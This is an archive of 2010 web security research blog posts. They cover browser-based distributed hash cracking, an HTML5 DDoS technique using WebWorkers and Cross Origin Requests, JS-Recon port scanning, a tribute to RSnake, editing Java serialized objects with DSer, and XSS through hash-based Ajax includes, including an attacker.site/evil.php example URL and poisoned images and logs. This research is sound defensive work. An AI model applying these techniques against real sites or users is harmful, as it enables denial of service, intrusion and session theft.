Thursday, December 16, 2010

Cracking hashes in the JavaScript cloud with Ravan

Password cracking and JavaScript are very rarely mentioned in the same sentence. JavaScript is a bad choice for the job due to two primary reasons - it cannot run continuously for long periods without freezing the browser and it is way slower than native code.

HTML5 takes care of the first problem with WebWorkers, now any website can start a background JavaScript thread that can run continuously without causing stability issues for the browser. That is one hurdle passed.

The second issue of speed is becoming less relevant with each passing day as the speed of JavaScript engines is increasing at a greater rate than the increase of system speed. It might surprise most people how fast JavaScript actually is, 100,000 MD5 hashes/sec on a i5 machine (Opera). Thats the best number I could get from my system, in most cases it would vary between 50,000 - 100,000 MD5 hashes/sec. This is still about 100-115 times slower than native code on the same machine but that's alright. What JavaScript lacks in outright speed can be more than made up for by its ability to distribute.

It is trivial to get someone to execute your JavaScript in their browsers, just get them to visit a link and you have remote code execution of the JavaScript kind, they don't have to download or install any applications on their system or have any special privileges. It is ridiculously easy to distribute computation with JavaScript. And with about 110 browsers pointed to your site you have already achieved the speed of native code on one machine. With 1100 browser that is equivalent to 10 machines cracking passwords in native code.

To demonstrate this I have built Ravan a JavaScript Distributed Computing System that can crack MD5, SHA1, SHA256, SHA512 hashes. Details on how it works and how to use it are available here. It was released at BlackHat Abu Dhabi last month and has already had over 700 hash submissions. Both the cracking of the hashes and management of the distribution process is done in JavaScript.

The commercial cloud might have made cracking hashes super cheap but the JavaScript cloud has made it free.

Wednesday, December 15, 2010

Performing DDoS attacks with HTML5 Cross Origin Requests & WebWorkers

Update: Shellex has performed detailed performance analysis of this technique.

DDoS attacks are the rage this year, atleast in the latter part of the year. There have been numerous instances of successful DDoS attacks just in the past few months. Some of the current DoS/DDoS options seem to be LOIC, HTTP POST DoS and Jester's unreleased XerXes.

This post is about a DDoS technique I spoke about at BlackHat Abu Dhabi that uses two HTML5 features - WebWorkers and Cross Origin Requests. It is a very simple yet effective technique - start a WebWorker that would fire multiple Cross Origin Requests at the target. This is possible since Cross Origin Requests that use the GET method can be sent to any website, the restriction is only on reading the response which is anyway not of interest in this case. Sending a cross domain GET request is nothing new, you can even do that by embedding a remote URL in the IMG or the SCRIPT tag but the interesting part here is performance. My tests on Safari and Chrome showed that both the browsers were able to send more than 10,000 Cross Origin Requests in one minute.

So simply by getting someone to visit a URL you can get them to send 10,000 HTTP requests/minute to a target of your choice. Now if you pick a juicy target URL, one that would make the server do some heavy processing then just 10,000 requests/minute might overwhelm it. Lets scale this a little, say 60 people visit the URL containing the DoS JavaScript, that is 10,000 requests/second at the target. With just 6000 visitors to this URL we can send around 1 million requests/second to the target. Getting 6000 Chrome and Safari users to visit a particular URL is no big deal really.

Maybe its not that simple, there are few things to consider here. When you send the first request to a particular page and the response does not contain the 'Access-Control-Allow-Origin' header with a suitable value then the browser refuses to send more requests to the same URL. This however can be easily bypassed by making every request unique by adding a dummy query-string parameter with changing values. The number of requests/minute is also a variable. The browser sends a certain number of requests and when it receives the responses for those it sends in the next set of requests and so on. So as the server slows down the browser's requests/minute rating would also slow down. The figure 10,000 requests/minute was clocked against a server located in the internal network, against a target in the Internet it would realistically be between 3000-4000 requests/minute. If the attacker is planning to target an internal server by getting the employees of that company to visit this malicious URL then the 10,000 requests/minute rating would apply.

I am not going to release any PoC as this might probably be a bad time to do that but it shouldn't be very difficult to put together something for testing once you understand how it works. It should be relatively easy to block this attack at the WAF since all Cross Origin Requests contain the 'Origin' header, that way you can differentiate between legitimate and malicious requests.

Saturday, December 11, 2010

Port Scanning with HTML5 and JS-Recon

This was one of the newer topics that I covered at BlackHat Abu Dhabi. HTML5 has two APIs for making cross domain calls - Cross Origin Requests and WebSockets. By using them JavaScript can make connections to any IP and to any port(apart from blocked ports), making them ideal candidates for port scanning.

Both the APIs have the 'readyState' property that indicates the status of the connection at a given time. The time duration for which a specific readyState value lasts has been found to vary based on the status of the target port to which the connection is being made. This means that by observing this difference in behavior we can determine if the port being connected to is open, closed or filtered. For Cross Origin Requests it is the duration of readyState 1 and for WebSockets it is readyState 0.

I tried to do some calibration of the time duration for the different port states and the data is below. These numbers only hold good when the target is in the internal network. If you are scanning a target on the internet then the network latency should be taken in to account.

Since this is not a socket-level but an application-level scan the success also depends on the nature of the application running on the target ports. When a request is sent to certain type of applications they read the request and remain silent keeping the socket open, probably expecting more input or input in the format they expect. If the target is running such a application then its status cannot be determined.

Since even closed ports can be identified we can extend this technique to perform network scanning as well as internal IP detection. I have written a tool called JS-Recon which can perform these. More details on the how JS-Recon works is here. These techniques only work when run from Windows machines, on *nix systems it is not possible to determine closed ports and the timing figures are quite different.

Tuesday, December 7, 2010

RSnake, Web Security and a few beers

BlackHat Abu Dhabi 2010 is special to me for many reasons, chief amongst them is that I got to meet one of my most favorite hackers - RSnake. When I started taking my baby steps in web security, like most people at that time, I started off by reading the excellent content available on OWASP combined with some heavy use of Google. Around this time I think it was Manish that introduced me to ha.ckers.org, am so glad that he did, it almost immediately became an addiction. Back then I only understood parts of what was written on ha.ckers.org, sometimes an entire post would be beyond my grasp but I still enjoyed reading them. It was not just a blog it was an event, an event where RSnake and his loyal band of commenters had a gala time. There are many instances where I had read a few Wikipedia articles and docs to understand a topic just so that I could know what RSnake and the commenters were laughing about.

I did not have to follow the RSS feeds of a few dozen blogs instead I only checked ha.ckers.org on a regular basis. If there was some interesting news in the web security world then it would be talked about at ha.ckers.org along with RSnake's opinion on how significant it is and how it impacts things, served with a pinch of humor. This was in addition to RSnakes's own bag of tricks which always had something clever. ha.ckers.org was an excellent learning medium and has probably helped and inspired countless folks like me across the world. Its is extremely hard to discuss an advanced topic without making a novice reader feel alienated and bored. Also it is equally hard to discuss a technically simple yet important topic without making the smart ones cringe. Somehow ha.ckers.org managed to do both very well, a feat that is very hard to match.

Coming from a part of the world where you almost never get to meet most of the famous hackers in person, in our heads RSnake usually has a larger than life image, he is more like a WebAppSec folk hero. So meeting him personally was really special. As a person he is very friendly, chilled out and did not seem to mind the fact that I am relatively a n00b :D. We spoke for quite a long time, heard a lot of interesting stories related to ha.ckers.org, his book and more. Though he didn't seem to like my choice of beer, meeting him has only increased my respect for him. He is one of the key figures who has shaped the web security industry and an inspiration for many.

This is an excerpt from a recent interview of his:
..if you love security, don't let the people at the top of the security industry dictate the terms by which you do your research, disclose your vulnerabilities, or do your job.You have a ton of potential, and life is too short.My Father used to tell me that if you love what you're doing you'll never work another day in your life.To paraphrase him - if you aren't having fun in security, you're doing something wrong.Put a smile on your face, and go do what makes you happy!
This probably says more about him than I can in a few dozen posts. As he shuts down ha.ckers.org to go on a different journey I would like to wish him success on behalf of all his followers from India. Good luck RSnake!


Monday, November 8, 2010

HTML5 goodness at BlackHat Abu Dhabi this week

Just three more days to go for my 'Attacking with HTML5' talk at BlackHat Abu Dhabi. In addition to covering some of the interesting HTML5 attacks already released during 2010 by myself and other researchers, it has two new sections - HTML5 based port scanning and HTML5 Botnets. I would be talking about a new way to perform JavaScript based port scans that gives very accurate results. How accurate? you can determine if the remote port is open/closed/filtered - that accurate. I am also going to release a tool called JSRecon that would perform port and network scans by using these techniques. Under HTML5 botnets I am going to talk about how you could send spam mails, perform a DDoS attack on a website and perform distributed cracking of hashes at incredible speeds - all using JavaScript. I am also going to release Ravan - a web based tool to perform distributed cracking of hashes in a legitimate way. I am pretty happy with the way Ravan has shaped up and am very excited to see how folks react to it. Initial reactions have been good. The whole point of the talk is that I am NOT bypassing any of the restrictions placed by the browser sandbox but instead am working well inside those restrictions - its just that the sandbox has got a whole lot looser :)

The tools and details would be online next week when I am back from Abu Dhabi. Stay tuned!

Tuesday, September 7, 2010

Re-visiting JAVA De-serialization: It can't get any simpler than this !!


Well it's been a while since I have blogged. Been quite busy with work lately. Also I guess Lava is better at blogging stuff so I'll leave that to him :)

After my talk at BH EU earlier this year, there has been quite a lot of other really cool stuff been published on penetration testing of JAVA Thick/Smart clients. Check out Javasnoop especially. It has some pretty good features you would like to use. Many people that I spoke to recently said to me that modifying objects programatically using the IRB shell in DSer would be difficult and it would require the penetration tester to have indepth knowledge of the application's source code. Well; in the first place, penetration testing is a skill and it does require hard work, so understanding the application's internals is part and parcel of the job. But that being said DSer allows you to play around with JAVA objects using an interactive shell with some helper methods and is completely extensible. It was meant to be a template, to add your own stuff and extend it's capabilities.

In this post I will show you a technique which will alow us to extend DSer and simplify the processing of modifying JAVA Objects. Before we start I would like to thank my colleague Chilik Tamir for introducing me to the XStream library and helping with this idea. XStream is a library to serialize JAVA objects to XML and back. Now getting back to the topic. Let's assume that we have a complex object that we encounter in our request or response packet as follows:

HashMap = { key1 = String[], key2 = HashMap }

I have chosen internally available JAVA objects for simplicity, but they can be any custom objects you like. Now modifying this in via HEX bytes would be a difficult task as we will see later. For demostration purposes, i'll make use of the following app:
Fig. 1: Demo app to generate complex JAVA objects
This application will use the inputs we supply in the 3 text fields and create a HashMap similar to the one showed above when the "Both" button is pressed and send it to the backend server for processing. Once we capture this request in Burp, it would give an output similar to this:
Fig. 2: Request showing raw serialized data captured in Burp
Which will be de-serialized and rendered in the DSer shell as follows:

{ keyTwo = [Ljava.lang.String;@70ac2b, 
  keyOne = { hmKey1=Manish,
             hmKey3=Andlabs,
             hmKey2=Saindane
           }
}

We can see that the HashMap has 2 keys (ie. keyOne and keyTwo) with values as a String Array and a HashMap. Now I have added a few custom functions to DSer that will make use of the XStream library and convert the above mentioned JAVA serialized object to XML, save it as a temp file and open it in any XML editor of your choice for further editing. The resulting XML will look as follows:
Fig. 3: XML generated from the JAVA serialized object
Notice how nicely XStream has rendered the XML from the given JAVA object. We can clearly see the <string-array> and the <map> elements (highlighted above) with the individual entries. We can edit the entries and modify it as we want. Let's modify the XML as follows:
Fig. 4: XML after modification
We have removed the "Andlabs" entry from the String Array and added two extra entries (ie. "Lavakumar" and "Kuppan"). Also the "hmKey3" entry has been removed from the inner HashMap (highlighted above). Now as soon as we save this XML and close the editor, the code in DSer will convert this XML back to a JAVA object which will look similar to this:


{ keyTwo = [Ljava.lang.String;@9568c, 
  keyOne = { hmKey1=Manish,,
             hmKey2=Saindane
           }
}

The custom functions will then take care of serializing this object, editing the "Content-Length" header and preparing a new "message" to be sent to the application server. You can observe the modified data in Burp from the history tab.

Fig. 5: Edited request as shown in the Burp
So using this technique, modification of the JAVA objects becomes trivial and anyone with no prior knowledge of programming can edit the objects (as long as he/she knows  how to edit text or XML ;)). The screenshot shows the modified data being successfully passed to the server and rendered back to the output.
Fig 6: Modified data processed by the application
DSer is not just restricted to JAVA serialized objects, but (almost) any binary protocol that you can think of. So do not restrict your thinking and be creative. In this post I just showed you how you can extend DSer's capabilities and simplify the process of editing JAVA objects. You can do the same with any other protocol. All you need is some basic understanding of how the protocol works.

I'll add the the above mentioned custom methods to DSer and release it soon. Just need to clean up the code and make a few changes here and there. If anyone need's to try it out in the mean time, just ping me and I'll give you the source code. So until next time, Happy hacking !!

Tuesday, August 10, 2010

XSSing client-side dynamic HTML includes by hiding HTML inside images and more

Matt Austin made a brilliant discovery sometime back and wrote a detailed post of his hack, you absolutely must read it. Basically it is a problem with sites that use Ajax to fetch pages mentioned in the URL after # and then include them in the innerHTML in a DIV element, he picks 'touch.facebook.com' as an example.

Quoting from his post:
If you click on any URL you see the links don't actually change the page but loads them with ajax. http://touch.facebook.com/#profile.php actually loads http://touch.facebook.com/profile.php into a div on the page.
The problem here is that the XMLHttpRequest object can make Cross Origin calls thanks to HTML5. So if a victim clicks on a link like 'http://touch.facebook.com/#http://attacker.site/evil.php' then 'http://attacker.site/evil.php' is fetched and is included in the innerHTML of the page leading to XSS. Clever find!

The very first paragarph of his post however made me very uncomfortable:
HTML 5 does not do much to solve browser security issues. In fact it actually broadens the scope of what can be exploited, and forces developers to fix code that was once thought safe.
Call me an HTML5 fanboy but I believe the spec designers have taken security very seriously based on the discussions I have seen while lurking on their mailings lists. So such a blatant allegation was hard for me to digest and I was secretly hoping that this design was vulnerable even without taking in to account the Cross Origin Request feature of HTML5.

And it turns out it is actually vulnerable even with plain old HTML4. The problem here is that the application fetches any page which is provided after the # and includes this in the innerHTML of a DIV element. So what this means is that every single file on that site - (CSS|JS|JPG|...|log) is now treated as HTML.

How is this a problem? Lets say the site lets users upload their profile pictures and stores these under the same domain name (FaceBook however uses a different domain name for storing static content). Normally this cannot lead to XSS because the img is only called from the <img> tag which parses and renders it as a image. However under the design being discussed, the same image file can be rendered as HTML. When a victim clicks on a link like 'http://vulnsite.com/#profile_334616.jpg' then 'profile_334616.jpg' is fetched and the 'responseText' is added to the innerHTML property.

It is possible to hide HTML inside images without any visual differences. The HTML can come after the End of Image marker (0xFF D9) or right before that and still the images looks the same. It can also be added in the comment section but some sites might remove the comments section from the images to save storage space. When the content of this image is render as HTML the binary section of the image is considered as text and displayed normally and the HTML section is parsed and rendered by Chrome, Safari and Firefox. Opera and IE however stop parsing after reading a few bytes of the binary content. I tried moving the HTML to the beginning of the image right after the Start of Image marker inside a comment section but still they refused to render it.

Check out this simple POC to see this in action.

Apart from images any user uploaded file could now potentially turn in to HTML under this design. Even if the site does not have any file upload features, an attacker could indirectly upload his images through social engineering. News and media websites routinely include images provided to them from external sources and an attacker could slip in his HTML poisoned image which might eventually end up on the site. Though a little far fetched something like this is not entirely impossible. Any compression technique used by the server on the images would however mangle the HTML.

Another way by which an attacker can get his data on the server is through server logs. If the log file contains all the User-Agent strings in unencoded format then an attacker could include HTML in his request's UA field and poison the server log. An administrator who has access to these logs can be sent a link like http://admin.vulnsite.com/#August2010.log and clicking on it would eventually lead to the rendering of that HTML.

Though there could be other scenario's I think you get the general idea. So coming back to the design itself, it was vulnerable to begin with and HTML5's Cross Origin Request made it incredibly easier to exploit.

Even with all these counter-arguments eventually I have to agree with Matt. Cross Origin Request was one feature where HTML5 did actually get it wrong because they gave additional capability to the same API with absolutely no extra code requirements. So the same code now could do things that the developers never anticipated. Its like suddenly one random morning you hit on your car's accelerator and then find out that now it is also wired to NOS, don't think you would like that surprise.

IE on the other hand had done the right thing with XDomainRequest which is a new API and not a simple extension of XHR. Probably the XMLHttpRequest object must get a new property which should be explicitly set to enable COR.

Eg:
var xhr = new XMLHttpRequest();
xhr.cor = true;
xhr.open("http://external.site/");
A simple extension like this could prevent existing code from becoming vulnerable while giving the same familiar XHR API to developers for COR.